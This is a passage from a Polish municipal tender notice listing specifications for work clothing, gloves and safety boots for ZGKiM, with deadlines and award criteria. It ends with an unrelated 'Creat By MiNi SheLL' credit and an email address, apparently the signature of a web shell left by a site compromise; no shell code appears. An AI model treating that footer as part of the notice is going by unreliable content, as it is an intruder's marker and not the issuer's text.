<p>-  możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w razie zmiany w przepisach prawa podatkowego, które dotyczą świadczenia usług lub dokonywania dostaw stanowiących przedmiot Umowy , w szczególności zmian w zakresie ustawy z dnia 11 marca 2004r    o podatku od towarów i usług , przepisów wykonawczych do niej lub aktów prawnych, które tę ustawę lub przepisy wykonawcze zastąpią. Warunkiem zmiany Umowy jest wystąpienie w okresie obowiązywania Umowy takiej zmiany w przepisach prawa podatkowego, która wpływa na obowiązek lub uprawnienia którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgkim.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Al. Zjednoczenia 110, pokój 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2012 godzina 08:00, miejsce: Oferty należy składać w siedzibie Zamawiającego pokój 101, lub w kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1 - dostawa odzieży roboczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  UBRANIE LETNIE      kolor czerwony - 340  kpl 
Logo ZGKiM na sercu (kieszonka), na plecach i na bawecie (kieszonka)
Tkanina poliestrowo bawełniana (35/65) czyli skład ( bawełna 35%+poliester 65%) , gramatura: 245g/m2

BLUZA - zapinana na guziki w kolorze czerwonym kryte listwą, na plecach zakładki regulujące tęgość, w pasie guma regulująca tęgość szer. 5cm, rękawy wydłużone od PN o 4cm, na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003 - zgodnie z deklaracją zgodności producenta, mankiet zapinany na guzik, z przodu odcinany karczek podkreślony niebieską wypustką, u góry dwie kieszenie naszywane z patkami zapinanymi na springi.
SPODNIE OGRODNICZKI - rozporek zapinany na guziki w kolorze czerwonym, regulacja tęgości w pasie lewy bok na guziki i guma z tyłu, regulacja tęgości nogawki u dołu na guziki, na prawej nogawce calówka, z przodu dwie naszywane kieszenie z ozdobnymi niebieskimi lamówkami, odcinany bawet podkreślony niebieską wypustką, na bawecie kieszeń zapinana na zamek,  w szelkach żakardowa taśma szelkowa.
Minimalny okres gwarancji wynosi 12 miesięcy. Wymagana deklaracja zgodności.

2. UBRANIE OCIEPLANE        kolor czerwony - 70 kpl 
Logo ZGKiM na sercu i na plecach
Tkanina poliestrowo bawełniana (35/65) czyli skład ( bawełna 35%+poliester 65%) , gramatura: 245g/m2

BLUZA - zapinana na guziki w kolorze czerwonym kryte listwą, ocieplina pikówka 100g/m2, wewnątrz kurtki regulacja tęgości,  na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003 - zgodnie z deklaracją zgodności producenta, wzmocnienia na łokciach, w mankiecie guma, z przodu odcinany karczek podkreślony niebieską wypustką, u dołu dwie kieszenie naszywane z ozdobną niebieską lamówką.
SPODNIE DO PASA - rozporek zapinany na guziki w kolorze czerwonym , ocieplina pikówka 100g/m2 , regulacja tęgości w pasie na guziki, wzmocnienie w kroku i na kolanach, na prawej nogawce calówka, z tyłu po prawej stronie naszywana kieszeń, z przodu dwie naszywane kieszenie z ozdobnymi niebieskimi lamówkami.
Minimalny okres gwarancji wynosi 36 miesięcy. Wymagana deklaracja zgodności.


3.   UBRANIE ROBOCZE GRANATOWE DLA MECHANIKÓW - 22 kpl
Logo ZGKiM na sercu (kieszonka), na plecach .
Tkanina poliestrowo bawełniana (35/65) czyli skład ( bawełna 35%+poliester 65%) , gramatura: 245g/m2
        
BLUZA zapinana na guziki kryte listwą , na plecach zakładki regulujące tęgość, w pasie guma regulująca tęgość szer. 5cm, na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003  - zgodnie z deklaracją zgodności producenta, mankiet zapinany na guzik, na dole dwie naszywane kieszenie , u góry dwie kieszenie naszywane z patkami zapinanymi na springi.
SPODNIE DO PASA - rozporek zapinany na guziki ,regulacja tęgości w pasie na guziki, na prawej nogawce calówka , z tyłu po prawej stronie naszywana kieszeń, z przodu dwie naszywane kieszenie. 
Minimalny okres gwarancji wynosi 6 miesięcy. Wymagana deklaracja zgodności.

4.   UBRANIE ROBOCZE SPAWALNICZE - 6 kpl
Tkanina ks proban, 100% bawełna

BLUZA prosta, bez ściągaczy, zapinana na guziki kryte listwą, na sercu od wewnątrz naszywana kieszeń, u dołu po bokach dwie wpuszczane kieszenie.

SPODNIE DO PASA - rozporek zapinany na guziki, regulacja tęgości w pasie, z przodu dwie naszywane kieszenie, z boku prawej nogawki calówka.
Minimalny okres gwarancji wynosi 9 miesięcy. 

5.   KOSZULA FLANELOWA -  310 szt                    
100% bawełna, splot płócienny, wątek luźno skręcony. drukowana dwubarwnie. Zapinana na 6 guzików, na lewej piersi naszywana kieszeń. Rękawy zakończone mankietami zapinanymi na jeden guzik. Szwy wykończone overlockiem. Minimalny okres gwarancji wynosi 12 miesięcy.
6. KALESONY-250 p                      

z miękkiej bawełny, jednostronnie czesanej o podwójnym wątku luźno skręconym. Guma w pasie, bawełniane ściągacze w nogawkach. Szwy zakończone overlockiem. Minimalny okres gwarancji wynosi 12 miesięcy. Kolor szary lub niebieski.

7.   LEGGINSY DAMSKIE -22 szt.

z miękkiej bawełny, gramatura 160 , skład 92% bawełny , 8% lycra.
8.   T-SHIRT - 450 szt.          
100% bawełny półczesanej, 150g/m2, elastyczny ściągacz, taśma wzmacniająca na ramionach, boki bezszwowe, podwójne szwy. Logo ZGKiM na sercu. Minimalny okres gwarancji wynosi 12 miesięcy.
9. CZAPKA FIRMOWA                                                                                                                     
czapka z daszkiem, tkanina poliestrowo bawełniana (35/65), cztery otwory wentylacyjne, z tyłu plastikowa regulacja wielkości czapki. Minimalny okres gwarancji wynosi 12 miesięcy.
  -  kolor granatowy bez Loga Zakładu- 14 szt 
  -  kolor czerwony z Logo Zakładu z przodu-180 szt 


10.   CZAPKA ZIMOWA -60 szt                       
tkanina poliestrowo bawełniana (35/65), typu uszanka, z daszkiem, ocieplana, obszyta futerkiem, możliwość zapinania na napy u góry i dołu.  Logo Zakładu z przodu. Minimalny okres gwarancji wynosi 36 miesięcy.
11.  UBRANIE PRZECIWDESZCZOWE - 50 szt.
kurtka ? przeciwdeszczowa za zamek błyskawiczny oraz spodnie do pasa wykonane z tkaniny nylonowej , wewnątrz podgumowany. Wodoszczelne szwy, zapięcie na zamek błyskawiczny, kaptur chowany w kołnierzu - regulacja szerokości mankietu i nogawek poprzez plastikowe napy, dwie duże kieszenie pokryte plisą , dół kurtki ścigany  sznurkiem. Minimalny okres gwarancji wynosi 36 miesięcy.

12.  KURTKA OCIEPLANA - 15 szt.                        
z tkaniny poliestrowej powlekanej PCW w kolorze ciemnym . Zapinana na zamek błyskawiczny kryty plisą zapinaną na rzepy. Wyposażona  w kaptur chowany w stójce. Podszewka poliestowa pikowana. Możliwość odpięcia ocieplenia. Zalecana odporność mrozowa do -30 stopni Celsjusza. Minimalny okres gwarancji wynosi 36 miesięcy.
13.   FARTUCH  DLA SPRZĄTACZEK -7  szt.                                            
tkanina poliestrowo-bawełniana (65/35), gramatura: 245g/m2, zapinany na guziki kryte listwą, dwie dolne kieszenie naszywane, otwarte, dwie górne kieszenie naszywane z patkami zapinanymi na rzep, rękawy zakończone mankietami zapinanymi na guziki, z tyłu rozcięcie na długości ok. 30cm. Minimalny okres gwarancji wynosi 12 miesięcy.

14.  SKARPETY BAWAEŁNIANE MĘSKIE                                                                                                       -   zimowe kolor czarny lub ciemno stalowy -20 p.      
-   letnie kolor czarny lub ciemno stalowy- 15 p..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.14.00.00-2, 18.22.32.00-0, 18.44.33.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - dostawa rękawic roboczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.   RĄKAWICE typu DRELICHOWE ROBOCZE -800 par
rękawice drelichowe z podszewką, 100% bawełna, pikowane, CE kat.1

2.  RĘKAWICE NALEWANE -3500 par
rękawice z tkaniny bawełnianej, powleczonej w ? szorstkowatym lateksem, do lekkich i średnio  ciężkich prac. CE kat.1
      
3.   RĘKAWICE typu NAKRAPIANE NA DZIANINIE PCW -1200 par
rękawice bawełniane, dziane, nakrapiane pcw, do prostych i lekkich prac. CE kat.1 
Długość minimum 25 cm.
      
4.   REKAWICE OGRODNICZE -9000 par
rękawice bawełniane, powlekane gumą w części chwytnej, do prostych i lekkich prac.      
CE kat.1 . Długość minimum 25 cm.

5.   RĘKAWICE DRELICHOWE OCIEPLANE -700 par                                                                                                                        
rękawice z grubej dzianiny poliestrowej , szorstkowata powierzchnia wewnętrzna zapewniająca  skuteczną izolację cieplną. Przedłużony ściągacz gwarantujący dobra przyleganie do nadgarstka. Dłonica powlekana podwójną warstwą lateksu spienionego dla poprawy izolacji i chwytności. 
CE kat. 1.

6.   RĘKAWICE NITRYLOWE  typu  440Y -14000 par
rękawice z dzianiny bawełnianej, powlekane ? lekkim nitrylem. Do prac lekkich i średnich. 
CE kat.1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie 3 - dostawa obuwia roboczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obuwie spełniające normę PN-EN-ISO 20344:2007 a w szczególności:

1.  OBUWIE ZIMOWE    (dla elektromonterów) -10 par
Kategoria obuwia bezpiecznego S3,. Podnosek stalowy, odporne na przebicie, wierzch skóry naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę. Minimalny okres gwarancji wynosi 36 miesięcy.

2.   OBUWIE ZIMOWE   ( dla mechaników ) -10 par
Kategoria obuwia bezpiecznego S3,  Podnosek stalowy,  odporne na przebicie, wierzch skóry  
 naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.  
Olejoodporne. Minimalny okres gwarancji wynosi 36  miesięcy.

3.   OBUWIE ZIMOWE  ( pozostałe ) -45 par
Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry 
naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.  
Minimalny okres gwarancji wynosi 36 miesięcy.

4.    OBUWIE LETNIE ROBOCZE   (dla elektromonterów) -15 par
Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry  
naturalne, wodoodporne, wysokość powyżej stawu skokowego. Minimalny okres  gwarancji wynosi 12 miesięcy.

5.    OBUWIE LETNIE ROBOCZE  ( dla mechaników ) -20 par
Kategoria obuwia bezpiecznego S3, odporne na przebicie. Podnosek stalowy, wierzch skóry 
naturalne, wodoodporne, wysokość powyżej stawu skokowego. Olejoodporne. Minimalny okres 
gwarancji wynosi 12 miesięcy.

6.  OBUWIE LETNIE ROBOCZE ( pozostałe ) -200 par
Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry naturalne, wodoodporne, wysokość powyżej stawu skokowego.  Minimalny okres gwarancji 
wynosi 12 miesięcy.

7.   BUTY GUMOWE-90 par
 Buty robocze gumowe. Wysokość butów 37 cm. CE kat.2 EN 347-1 . Wzór 6187 .                                    
Minimalny okres gwarancji wynosi 12 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.00.00-6, 18.81.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com